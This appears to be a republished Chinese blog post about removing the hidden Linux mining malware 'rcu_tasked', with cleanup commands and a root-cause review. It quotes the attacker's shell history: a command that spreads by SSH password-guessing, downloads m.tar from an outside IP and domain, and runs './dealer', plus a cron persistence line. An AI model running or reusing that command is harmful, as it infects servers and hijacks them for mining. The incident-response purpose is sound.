【安全】查杀linux隐藏挖矿病毒rcu_tasked

这篇具有很好参考价值的文章主要介绍了【安全】查杀linux隐藏挖矿病毒rcu_tasked。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

记录一次项目中挖矿病毒的经历

这是黑客使用的批量蔓延病毒的工具,通过如下脚本

[root@Server .cfg]# cat /home/pischi/.bash_history
cd /root/
nvidia-smi;ls -a;cd .cfg;ls -a;wc -l ip
./key 20 -f ip pass 22 "nproc;nvidia-smi;rm -rf .cfg;mkdir .cfg;cd .cfg; wget 193.42.32.96/m.tar || curl -O vvnnmm.com/m.tar ; tar xvf m.tar || tar xvf m.tar.1 ; rm -rf m.tar*;chmod +x *;./dealer"

pischi,安全,运维开发,linux,安全

/root/.cfg/目录下的病毒源文件
pischi,安全,运维开发,linux,安全
目前未查清楚原文件是通过隐藏在什么程序中带过来的,这是一大遗憾

中毒现象

中毒现象提现未cpu占用100%,且通过top、netstat、ps等命令找不到进程号
pischi,安全,运维开发,linux,安全
挖矿的矿池IP,全是国外的IP,大概看了一下,基本是德国、芬兰、印度、美国等地区的
pischi,安全,运维开发,linux,安全
pischi,安全,运维开发,linux,安全

另外存在未知跟root权限一样高的用户“pischi”
pischi,安全,运维开发,linux,安全

解决方案

主要策略就是找到病毒,然后删除,如下是相关的命令

# 病毒清除

rcu_tasked,伪装挖矿程序清除

# 病毒通过这个文件实现隐藏进程ID,将里面的内容/usr/local/lib/libextrasshd.so删除即可
rm -f /etc/ld.so.preload 

rm -f /usr/local/lib/libextrasshd.so

rm -rf /root/.cfg/
rm -rf /usr/bin/mslog/
rm -f /usr/bin/player

找到rcu_tasked病毒进程
netstat -antp
ps -ef | grep rcu_tasked
kill -9 xxx

systemctl disable myservice
rm -f /lib/systemd/system/myservice.service

删除 pischi 用户
vipw

删除 pischi shadow
vipw -s

删除pischi用户目录
rm -rf /home/pischi/

删除定时任务
crontab -e
删除此行
@monthly /root/.cfg/./dealer  > /dev/null 2>&1 & disown

重启操作系统
reboot

复盘原因

前期项目比较着急,统一使用了一个跳板机,多人使用且均用了root用户,权限管控不到位,所有机器密码都一样,这期间可能密码泄露导致了此问题

参考文档
系统杀毒复盘
隐藏挖矿木马rcu_tasked的查杀
【安全】查杀linux上c3pool挖矿病毒xmrig
【安全】查杀linux挖矿病毒 kswapd0
【安全】查杀linux隐藏挖矿病毒rcu_tasked
【安全】挖矿木马自助清理手册文章来源地址https://www.toymoban.com/news/detail-851724.html

到了这里,关于【安全】查杀linux隐藏挖矿病毒rcu_tasked的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • linux中了挖矿病毒详细解决方案

    阿里云服务器无意间CPU直线飙升接近100%,通过TOP查看CPU暂用情况,未发现异常,然后感觉肯定是中了挖矿病毒了。一下是搜索了很多资料总结的解决方案,希望对遇到这些问题的人员有个好的帮助。 目录 1、通过TOP查看未发现异常情况,肯定是病毒隐藏了进程 2、删除之后通

    2024年02月05日
    浏览(77)
  • 黑客利用F5 BIG-IP漏洞传播Linux挖矿病毒

    F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 近日,F5的安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞,建议广大用户及时将F5 BIG-IP/BIG-IQ升级到最新版本,最新版本下载地址: https://support.f5.com/csp/article/K02566623,漏洞

    2024年02月20日
    浏览(49)
  • 【linux】挖矿病毒nanominer伪装成python占用服务器GPU!本文带你分析并杀毒!

    可以看到root用户将GPU的核心跑满了每个占用都是100%,显存吃了6G多。 不能正常显示GPU被哪些进程占用 在/tmp/.x/目录中 总结: amdmemtweak: 优化显存时序,提高挖矿效能 config.ini: 挖矿配置文件 doos.pid: 挖矿进程的pid号 logs: 挖矿病毒的输出log nanominer: 3.7.7-linux版本的挖矿病毒,这

    2024年02月14日
    浏览(41)
  • 【科普+技术】Linux服务器被占用大量资源,用三大网站排查ip地址和初步处理挖矿病毒

    五星红旗在bg飘扬——中国黑客的复仇 这里的“挖矿”只是个说法不是拿着锄头进矿洞,是指一段时间内在比特币系统中发生的交易进行确认,并记录在 区块链 上,形成新的区块,而挖矿的人叫作 矿工 。比特币系统的记账权利是去中心化的,即每个矿工都有记账的权利,只

    2023年04月15日
    浏览(50)
  • 挖矿病毒应急响应思路,挖矿病毒事件处理步骤

    「作者简介」: CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「推荐专栏」: 对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 比特币系统每隔一段时间就会在节点上生成一个 「随机代码」 ,互联网中的所有设备都可以寻找这个代

    2024年02月10日
    浏览(44)
  • 下载了恶意软件怎么办,用这个软件可以解决 Mac电脑卸载软件 MacBook查杀病毒

    随着苹果电脑在全球市场的普及,它们也日益成为恶意软件制作者的目标。这种趋势打破了许多人认为Mac系统不易受到病毒或恶意软件影响的传统观念。事实上,苹果电脑面临的恶意软件和安全威胁正在不断增多,这要求用户采取更加积极的措施来保护自己的设备和数据。下

    2024年04月15日
    浏览(77)
  • 挖矿病毒常见处置方法

    挖矿病毒特征: “挖矿”病毒是一段恶意代码或者一个软件,一般利用主机或者操作系统的高危漏洞术在局域网内传播,控制电脑进行大量的计算机运算来获取虚拟货币。该病毒会消耗大量的计算机处理资源,常见的就是系统中毒后系统CPU占用接近100%、系统卡顿执行基本命

    2024年02月13日
    浏览(36)
  • “挖矿”病毒排查处置方法

    挖矿病毒被植入主机后,利用主机的运算力进行挖矿,主要体现在CPU使用率高达90%以上,有大量对外进行网络连接的日志记录。 Linux主机中挖矿病毒后的现象如下图所示: Windows主机中挖矿病毒后的现象如下图所示: 一旦发现主机或服务器存在上述现象,则极有可能已经感染

    2024年02月08日
    浏览(34)
  • 阿里云挖矿病毒解决

    有一次,我们在阿里上的服务器收到这样的短信。 【阿里云】尊敬的xxxxxx:  经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站

    2024年02月08日
    浏览(40)
  • 电脑是否中挖矿病毒

    『壹』 怎么检查自己电脑有没有被人用来挖矿,比特币 挖矿都是烧的显卡,以下方法可以鉴定自己显卡是不是矿卡 1:通过肉眼来识别这个硬件究竟是不是矿卡 ,其实通过其他方式也可以测出,就比如说你到电脑里面去测矿卡的超频性能,去跟官方的数据进行对比,测矿卡

    2023年04月09日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包